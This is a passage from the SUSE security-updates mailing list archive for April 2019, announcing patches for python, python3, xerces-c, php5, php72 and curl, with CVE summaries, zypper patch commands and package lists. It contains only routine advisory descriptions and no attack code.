python-doc-pdf-2.7.14-7.11.2 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): python-debuginfo-2.7.14-7.11.1 python-debugsource-2.7.14-7.11.1 python-tk-2.7.14-7.11.1 python-tk-debuginfo-2.7.14-7.11.1 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libpython2_7-1_0-2.7.14-7.11.1 libpython2_7-1_0-debuginfo-2.7.14-7.11.1 python-2.7.14-7.11.1 python-base-2.7.14-7.11.1 python-base-debuginfo-2.7.14-7.11.1 python-base-debugsource-2.7.14-7.11.1 python-curses-2.7.14-7.11.1 python-curses-debuginfo-2.7.14-7.11.1 python-debuginfo-2.7.14-7.11.1 python-debugsource-2.7.14-7.11.1 python-devel-2.7.14-7.11.1 python-gdbm-2.7.14-7.11.1 python-gdbm-debuginfo-2.7.14-7.11.1 python-xml-2.7.14-7.11.1 python-xml-debuginfo-2.7.14-7.11.1 References: https://www.suse.com/security/cve/CVE-2019-9636.html https://www.suse.com/security/cve/CVE-2019-9948.html https://bugzilla.suse.com/1129346 https://bugzilla.suse.com/1130847 From sle-security-updates at lists.suse.com Wed Apr 17 13:23:51 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 17 Apr 2019 21:23:51 +0200 (CEST) Subject: SUSE-SU-2019:0971-1: important: Security update for python3 Message-ID: <20190417192351.3F062FDF1@maintenance.suse.de> SUSE Security Update: Security update for python3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0971-1 Rating: important References: #1129346 Cross-References: CVE-2019-9636 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Development Tools 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for python3 fixes the following issues: Security issue fixed: - CVE-2019-9636: Fixed an information disclosure because of incorrect handling of Unicode encoding during NFKC normalization (bsc#1129346). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-971=1 - SUSE Linux Enterprise Module for Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-971=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-971=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): python3-base-debuginfo-3.6.5-3.11.1 python3-base-debugsource-3.6.5-3.11.1 python3-testsuite-3.6.5-3.11.1 python3-testsuite-debuginfo-3.6.5-3.11.1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): python3-doc-3.6.5-3.11.2 - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64): python3-base-debuginfo-3.6.5-3.11.1 python3-base-debugsource-3.6.5-3.11.1 python3-tools-3.6.5-3.11.1 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libpython3_6m1_0-3.6.5-3.11.1 libpython3_6m1_0-debuginfo-3.6.5-3.11.1 python3-3.6.5-3.11.1 python3-base-3.6.5-3.11.1 python3-base-debuginfo-3.6.5-3.11.1 python3-base-debugsource-3.6.5-3.11.1 python3-curses-3.6.5-3.11.1 python3-curses-debuginfo-3.6.5-3.11.1 python3-dbm-3.6.5-3.11.1 python3-dbm-debuginfo-3.6.5-3.11.1 python3-debuginfo-3.6.5-3.11.1 python3-debugsource-3.6.5-3.11.1 python3-devel-3.6.5-3.11.1 python3-devel-debuginfo-3.6.5-3.11.1 python3-idle-3.6.5-3.11.1 python3-tk-3.6.5-3.11.1 python3-tk-debuginfo-3.6.5-3.11.1 References: https://www.suse.com/security/cve/CVE-2019-9636.html https://bugzilla.suse.com/1129346 From sle-security-updates at lists.suse.com Wed Apr 17 16:09:01 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 18 Apr 2019 00:09:01 +0200 (CEST) Subject: SUSE-SU-2019:0977-1: Security update for xerces-c Message-ID: <20190417220901.B4C7BFDF1@maintenance.suse.de> SUSE Security Update: Security update for xerces-c ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0977-1 Rating: low References: #1083630 Cross-References: CVE-2017-12627 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for xerces-c fixes the following issue: - CVE-2017-12627: Processing of external DTD paths could have resulted in a null pointer dereference under certain conditions (bsc#1083630) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-977=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-977=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): xerces-c-3.1.4-3.3.25 xerces-c-debuginfo-3.1.4-3.3.25 xerces-c-debugsource-3.1.4-3.3.25 xerces-c-doc-3.1.4-3.3.25 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libxerces-c-3_1-3.1.4-3.3.25 libxerces-c-3_1-debuginfo-3.1.4-3.3.25 libxerces-c-devel-3.1.4-3.3.25 xerces-c-debuginfo-3.1.4-3.3.25 xerces-c-debugsource-3.1.4-3.3.25 References: https://www.suse.com/security/cve/CVE-2017-12627.html https://bugzilla.suse.com/1083630 From sle-security-updates at lists.suse.com Thu Apr 18 10:11:54 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 18 Apr 2019 18:11:54 +0200 (CEST) Subject: SUSE-SU-2019:0985-1: moderate: Security update for php5 Message-ID: <20190418161154.86907FDF1@maintenance.suse.de> SUSE Security Update: Security update for php5 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0985-1 Rating: moderate References: #1126711 #1126713 #1126821 #1126823 #1127122 #1128722 Cross-References: CVE-2018-20783 CVE-2019-9020 CVE-2019-9021 CVE-2019-9023 CVE-2019-9024 CVE-2019-9641 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Module for Web Scripting 12 ______________________________________________________________________________ An update that fixes 6 vulnerabilities is now available. Description: This update for php5 fixes the following issues: Security issues fixed: - CVE-2019-9024: Fixed a vulnerability in xmlrpc_decode function which could allow to a hostile XMLRPC server to cause memory read outside the allocated areas (bsc#1126821). - CVE-2019-9020: Fixed a heap out of bounds in xmlrpc_decode function (bsc#1126711). - CVE-2018-20783: Fixed a buffer over-read in PHAR reading functions which could allow an attacker to read allocated and unallocated memory when parsing a phar file (bsc#1127122). - CVE-2019-9021: Fixed a heap buffer-based buffer over-read in PHAR reading functions which could allow an attacker to read allocated and unallocated memory when parsing a phar file (bsc#1126713). - CVE-2019-9023: Fixed multiple heap-based buffer over-read instances in mbstring regular expression functions (bsc#1126823). - CVE-2019-9641: Fixed multiple invalid memory access in EXIF extension and improved insecure implementation of rename function (bsc#1128722). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-985=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-985=1 - SUSE Linux Enterprise Module for Web Scripting 12: zypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2019-985=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): php5-debuginfo-5.5.14-109.51.6 php5-debugsource-5.5.14-109.51.6 php5-devel-5.5.14-109.51.6 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): php5-debuginfo-5.5.14-109.51.6 php5-debugsource-5.5.14-109.51.6 php5-devel-5.5.14-109.51.6 - SUSE Linux Enterprise Module for Web Scripting 12 (aarch64 ppc64le s390x x86_64): apache2-mod_php5-5.5.14-109.51.6 apache2-mod_php5-debuginfo-5.5.14-109.51.6 php5-5.5.14-109.51.6 php5-bcmath-5.5.14-109.51.6 php5-bcmath-debuginfo-5.5.14-109.51.6 php5-bz2-5.5.14-109.51.6 php5-bz2-debuginfo-5.5.14-109.51.6 php5-calendar-5.5.14-109.51.6 php5-calendar-debuginfo-5.5.14-109.51.6 php5-ctype-5.5.14-109.51.6 php5-ctype-debuginfo-5.5.14-109.51.6 php5-curl-5.5.14-109.51.6 php5-curl-debuginfo-5.5.14-109.51.6 php5-dba-5.5.14-109.51.6 php5-dba-debuginfo-5.5.14-109.51.6 php5-debuginfo-5.5.14-109.51.6 php5-debugsource-5.5.14-109.51.6 php5-dom-5.5.14-109.51.6 php5-dom-debuginfo-5.5.14-109.51.6 php5-enchant-5.5.14-109.51.6 php5-enchant-debuginfo-5.5.14-109.51.6 php5-exif-5.5.14-109.51.6 php5-exif-debuginfo-5.5.14-109.51.6 php5-fastcgi-5.5.14-109.51.6 php5-fastcgi-debuginfo-5.5.14-109.51.6 php5-fileinfo-5.5.14-109.51.6 php5-fileinfo-debuginfo-5.5.14-109.51.6 php5-fpm-5.5.14-109.51.6 php5-fpm-debuginfo-5.5.14-109.51.6 php5-ftp-5.5.14-109.51.6 php5-ftp-debuginfo-5.5.14-109.51.6 php5-gd-5.5.14-109.51.6 php5-gd-debuginfo-5.5.14-109.51.6 php5-gettext-5.5.14-109.51.6 php5-gettext-debuginfo-5.5.14-109.51.6 php5-gmp-5.5.14-109.51.6 php5-gmp-debuginfo-5.5.14-109.51.6 php5-iconv-5.5.14-109.51.6 php5-iconv-debuginfo-5.5.14-109.51.6 php5-imap-5.5.14-109.51.6 php5-imap-debuginfo-5.5.14-109.51.6 php5-intl-5.5.14-109.51.6 php5-intl-debuginfo-5.5.14-109.51.6 php5-json-5.5.14-109.51.6 php5-json-debuginfo-5.5.14-109.51.6 php5-ldap-5.5.14-109.51.6 php5-ldap-debuginfo-5.5.14-109.51.6 php5-mbstring-5.5.14-109.51.6 php5-mbstring-debuginfo-5.5.14-109.51.6 php5-mcrypt-5.5.14-109.51.6 php5-mcrypt-debuginfo-5.5.14-109.51.6 php5-mysql-5.5.14-109.51.6 php5-mysql-debuginfo-5.5.14-109.51.6 php5-odbc-5.5.14-109.51.6 php5-odbc-debuginfo-5.5.14-109.51.6 php5-opcache-5.5.14-109.51.6 php5-opcache-debuginfo-5.5.14-109.51.6 php5-openssl-5.5.14-109.51.6 php5-openssl-debuginfo-5.5.14-109.51.6 php5-pcntl-5.5.14-109.51.6 php5-pcntl-debuginfo-5.5.14-109.51.6 php5-pdo-5.5.14-109.51.6 php5-pdo-debuginfo-5.5.14-109.51.6 php5-pgsql-5.5.14-109.51.6 php5-pgsql-debuginfo-5.5.14-109.51.6 php5-phar-5.5.14-109.51.6 php5-phar-debuginfo-5.5.14-109.51.6 php5-posix-5.5.14-109.51.6 php5-posix-debuginfo-5.5.14-109.51.6 php5-pspell-5.5.14-109.51.6 php5-pspell-debuginfo-5.5.14-109.51.6 php5-shmop-5.5.14-109.51.6 php5-shmop-debuginfo-5.5.14-109.51.6 php5-snmp-5.5.14-109.51.6 php5-snmp-debuginfo-5.5.14-109.51.6 php5-soap-5.5.14-109.51.6 php5-soap-debuginfo-5.5.14-109.51.6 php5-sockets-5.5.14-109.51.6 php5-sockets-debuginfo-5.5.14-109.51.6 php5-sqlite-5.5.14-109.51.6 php5-sqlite-debuginfo-5.5.14-109.51.6 php5-suhosin-5.5.14-109.51.6 php5-suhosin-debuginfo-5.5.14-109.51.6 php5-sysvmsg-5.5.14-109.51.6 php5-sysvmsg-debuginfo-5.5.14-109.51.6 php5-sysvsem-5.5.14-109.51.6 php5-sysvsem-debuginfo-5.5.14-109.51.6 php5-sysvshm-5.5.14-109.51.6 php5-sysvshm-debuginfo-5.5.14-109.51.6 php5-tokenizer-5.5.14-109.51.6 php5-tokenizer-debuginfo-5.5.14-109.51.6 php5-wddx-5.5.14-109.51.6 php5-wddx-debuginfo-5.5.14-109.51.6 php5-xmlreader-5.5.14-109.51.6 php5-xmlreader-debuginfo-5.5.14-109.51.6 php5-xmlrpc-5.5.14-109.51.6 php5-xmlrpc-debuginfo-5.5.14-109.51.6 php5-xmlwriter-5.5.14-109.51.6 php5-xmlwriter-debuginfo-5.5.14-109.51.6 php5-xsl-5.5.14-109.51.6 php5-xsl-debuginfo-5.5.14-109.51.6 php5-zip-5.5.14-109.51.6 php5-zip-debuginfo-5.5.14-109.51.6 php5-zlib-5.5.14-109.51.6 php5-zlib-debuginfo-5.5.14-109.51.6 - SUSE Linux Enterprise Module for Web Scripting 12 (noarch): php5-pear-5.5.14-109.51.6 References: https://www.suse.com/security/cve/CVE-2018-20783.html https://www.suse.com/security/cve/CVE-2019-9020.html https://www.suse.com/security/cve/CVE-2019-9021.html https://www.suse.com/security/cve/CVE-2019-9023.html https://www.suse.com/security/cve/CVE-2019-9024.html https://www.suse.com/security/cve/CVE-2019-9641.html https://bugzilla.suse.com/1126711 https://bugzilla.suse.com/1126713 https://bugzilla.suse.com/1126821 https://bugzilla.suse.com/1126823 https://bugzilla.suse.com/1127122 https://bugzilla.suse.com/1128722 From sle-security-updates at lists.suse.com Tue Apr 23 04:10:25 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 23 Apr 2019 12:10:25 +0200 (CEST) Subject: SUSE-SU-2019:0988-1: moderate: Security update for php72 Message-ID: <20190423101025.6C061FEBC@maintenance.suse.de> SUSE Security Update: Security update for php72 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0988-1 Rating: moderate References: #1128883 #1128886 #1128887 #1128889 #1128892 Cross-References: CVE-2019-9637 CVE-2019-9638 CVE-2019-9639 CVE-2019-9640 CVE-2019-9675 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Module for Web Scripting 12 ______________________________________________________________________________ An update that fixes 5 vulnerabilities is now available. Description: This update for php72 fixes the following issues: - CVE-2019-9637: Due to the way rename() across filesystems is implemented, it was possible that file being renamed is briefly available with wrong permissions while the rename is ongoing, thus enabling unauthorized users to access the data. (bsc#1128892) - CVE-2019-9675: phar_tar_writeheaders_int in ext/phar/tar.c has a buffer overflow via a long link value. NOTE: The vendor indicates that the link value is used only when an archive contains a symlink, which currently cannot happen: "This issue allows theoretical compromise of security, but a practical attack is usually impossible." (bsc#1128886) - CVE-2019-9638: An issue was discovered in the EXIF component in PHP. There was an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the maker_note->offset relationship to value_len. (bsc#1128889) - CVE-2019-9639: An issue was discovered in the EXIF component in PHP. There was an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the data_len variable. (bsc#1128887) - CVE-2019-9640: An issue was discovered in the EXIF component in PHP. There was an Invalid Read in exif_process_SOFn. (bsc#1128883) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-988=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-988=1 - SUSE Linux Enterprise Module for Web Scripting 12: zypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2019-988=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): php72-debuginfo-7.2.5-1.10.1 php72-debugsource-7.2.5-1.10.1 php72-devel-7.2.5-1.10.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): php72-debuginfo-7.2.5-1.10.1 php72-debugsource-7.2.5-1.10.1 php72-devel-7.2.5-1.10.1 - SUSE Linux Enterprise Module for Web Scripting 12 (aarch64 ppc64le s390x x86_64): apache2-mod_php72-7.2.5-1.10.1 apache2-mod_php72-debuginfo-7.2.5-1.10.1 php72-7.2.5-1.10.1 php72-bcmath-7.2.5-1.10.1 php72-bcmath-debuginfo-7.2.5-1.10.1 php72-bz2-7.2.5-1.10.1 php72-bz2-debuginfo-7.2.5-1.10.1 php72-calendar-7.2.5-1.10.1 php72-calendar-debuginfo-7.2.5-1.10.1 php72-ctype-7.2.5-1.10.1 php72-ctype-debuginfo-7.2.5-1.10.1 php72-curl-7.2.5-1.10.1 php72-curl-debuginfo-7.2.5-1.10.1 php72-dba-7.2.5-1.10.1 php72-dba-debuginfo-7.2.5-1.10.1 php72-debuginfo-7.2.5-1.10.1 php72-debugsource-7.2.5-1.10.1 php72-dom-7.2.5-1.10.1 php72-dom-debuginfo-7.2.5-1.10.1 php72-enchant-7.2.5-1.10.1 php72-enchant-debuginfo-7.2.5-1.10.1 php72-exif-7.2.5-1.10.1 php72-exif-debuginfo-7.2.5-1.10.1 php72-fastcgi-7.2.5-1.10.1 php72-fastcgi-debuginfo-7.2.5-1.10.1 php72-fileinfo-7.2.5-1.10.1 php72-fileinfo-debuginfo-7.2.5-1.10.1 php72-fpm-7.2.5-1.10.1 php72-fpm-debuginfo-7.2.5-1.10.1 php72-ftp-7.2.5-1.10.1 php72-ftp-debuginfo-7.2.5-1.10.1 php72-gd-7.2.5-1.10.1 php72-gd-debuginfo-7.2.5-1.10.1 php72-gettext-7.2.5-1.10.1 php72-gettext-debuginfo-7.2.5-1.10.1 php72-gmp-7.2.5-1.10.1 php72-gmp-debuginfo-7.2.5-1.10.1 php72-iconv-7.2.5-1.10.1 php72-iconv-debuginfo-7.2.5-1.10.1 php72-imap-7.2.5-1.10.1 php72-imap-debuginfo-7.2.5-1.10.1 php72-intl-7.2.5-1.10.1 php72-intl-debuginfo-7.2.5-1.10.1 php72-json-7.2.5-1.10.1 php72-json-debuginfo-7.2.5-1.10.1 php72-ldap-7.2.5-1.10.1 php72-ldap-debuginfo-7.2.5-1.10.1 php72-mbstring-7.2.5-1.10.1 php72-mbstring-debuginfo-7.2.5-1.10.1 php72-mysql-7.2.5-1.10.1 php72-mysql-debuginfo-7.2.5-1.10.1 php72-odbc-7.2.5-1.10.1 php72-odbc-debuginfo-7.2.5-1.10.1 php72-opcache-7.2.5-1.10.1 php72-opcache-debuginfo-7.2.5-1.10.1 php72-openssl-7.2.5-1.10.1 php72-openssl-debuginfo-7.2.5-1.10.1 php72-pcntl-7.2.5-1.10.1 php72-pcntl-debuginfo-7.2.5-1.10.1 php72-pdo-7.2.5-1.10.1 php72-pdo-debuginfo-7.2.5-1.10.1 php72-pgsql-7.2.5-1.10.1 php72-pgsql-debuginfo-7.2.5-1.10.1 php72-phar-7.2.5-1.10.1 php72-phar-debuginfo-7.2.5-1.10.1 php72-posix-7.2.5-1.10.1 php72-posix-debuginfo-7.2.5-1.10.1 php72-pspell-7.2.5-1.10.1 php72-pspell-debuginfo-7.2.5-1.10.1 php72-readline-7.2.5-1.10.1 php72-readline-debuginfo-7.2.5-1.10.1 php72-shmop-7.2.5-1.10.1 php72-shmop-debuginfo-7.2.5-1.10.1 php72-snmp-7.2.5-1.10.1 php72-snmp-debuginfo-7.2.5-1.10.1 php72-soap-7.2.5-1.10.1 php72-soap-debuginfo-7.2.5-1.10.1 php72-sockets-7.2.5-1.10.1 php72-sockets-debuginfo-7.2.5-1.10.1 php72-sqlite-7.2.5-1.10.1 php72-sqlite-debuginfo-7.2.5-1.10.1 php72-sysvmsg-7.2.5-1.10.1 php72-sysvmsg-debuginfo-7.2.5-1.10.1 php72-sysvsem-7.2.5-1.10.1 php72-sysvsem-debuginfo-7.2.5-1.10.1 php72-sysvshm-7.2.5-1.10.1 php72-sysvshm-debuginfo-7.2.5-1.10.1 php72-tidy-7.2.5-1.10.1 php72-tidy-debuginfo-7.2.5-1.10.1 php72-tokenizer-7.2.5-1.10.1 php72-tokenizer-debuginfo-7.2.5-1.10.1 php72-wddx-7.2.5-1.10.1 php72-wddx-debuginfo-7.2.5-1.10.1 php72-xmlreader-7.2.5-1.10.1 php72-xmlreader-debuginfo-7.2.5-1.10.1 php72-xmlrpc-7.2.5-1.10.1 php72-xmlrpc-debuginfo-7.2.5-1.10.1 php72-xmlwriter-7.2.5-1.10.1 php72-xmlwriter-debuginfo-7.2.5-1.10.1 php72-xsl-7.2.5-1.10.1 php72-xsl-debuginfo-7.2.5-1.10.1 php72-zip-7.2.5-1.10.1 php72-zip-debuginfo-7.2.5-1.10.1 php72-zlib-7.2.5-1.10.1 php72-zlib-debuginfo-7.2.5-1.10.1 - SUSE Linux Enterprise Module for Web Scripting 12 (noarch): php72-pear-7.2.5-1.10.1 php72-pear-Archive_Tar-7.2.5-1.10.1 References: https://www.suse.com/security/cve/CVE-2019-9637.html https://www.suse.com/security/cve/CVE-2019-9638.html https://www.suse.com/security/cve/CVE-2019-9639.html https://www.suse.com/security/cve/CVE-2019-9640.html https://www.suse.com/security/cve/CVE-2019-9675.html https://bugzilla.suse.com/1128883 https://bugzilla.suse.com/1128886 https://bugzilla.suse.com/1128887 https://bugzilla.suse.com/1128889 https://bugzilla.suse.com/1128892 From sle-security-updates at lists.suse.com Tue Apr 23 16:09:11 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 24 Apr 2019 00:09:11 +0200 (CEST) Subject: SUSE-SU-2019:0996-1: important: Security update for curl Message-ID: <20190423220911.754F7FDF1@maintenance.suse.de> SUSE Security Update: Security update for curl ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0996-1 Rating: important References: #1112758 #1131886 Cross-References: CVE-2018-16839 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 SUSE CaaS Platform ALL SUSE CaaS Platform 3.0 OpenStack Cloud Magnum Orchestration 7 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for curl fixes the following issues: Security issue fixed: - CVE-2018-16839: Fixed a buffer overflow in the SASL authentication code (bsc#1112758). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-996=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-996=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-996=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-996=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-996=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-996=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-996=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-996=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-996=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-996=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-996=1 - SUSE CaaS Platform ALL: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - SUSE CaaS Platform 3.0: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - OpenStack Cloud Magnum Orchestration 7: zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-996=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-32bit-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl-devel-7.37.0-37.37.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64): libcurl4-32bit-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-32bit-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libcurl4-32bit-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (s390x x86_64): libcurl4-32bit-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-32bit-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64): libcurl4-32bit-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64): libcurl4-32bit-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-32bit-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE Enterprise Storage 4 (x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-32bit-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-32bit-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE CaaS Platform ALL (x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - SUSE CaaS Platform 3.0 (x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 - OpenStack Cloud Magnum Orchestration 7 (x86_64): curl-7.37.0-37.37.1 curl-debuginfo-7.37.0-37.37.1 curl-debugsource-7.37.0-37.37.1 libcurl4-7.37.0-37.37.1 libcurl4-debuginfo-7.37.0-37.37.1 References: https://www.suse.com/security/cve/CVE-2018-16839.html https://bugzilla.suse.com/1112758 https://bugzilla.suse.com/1131886 From sle-security-updates at 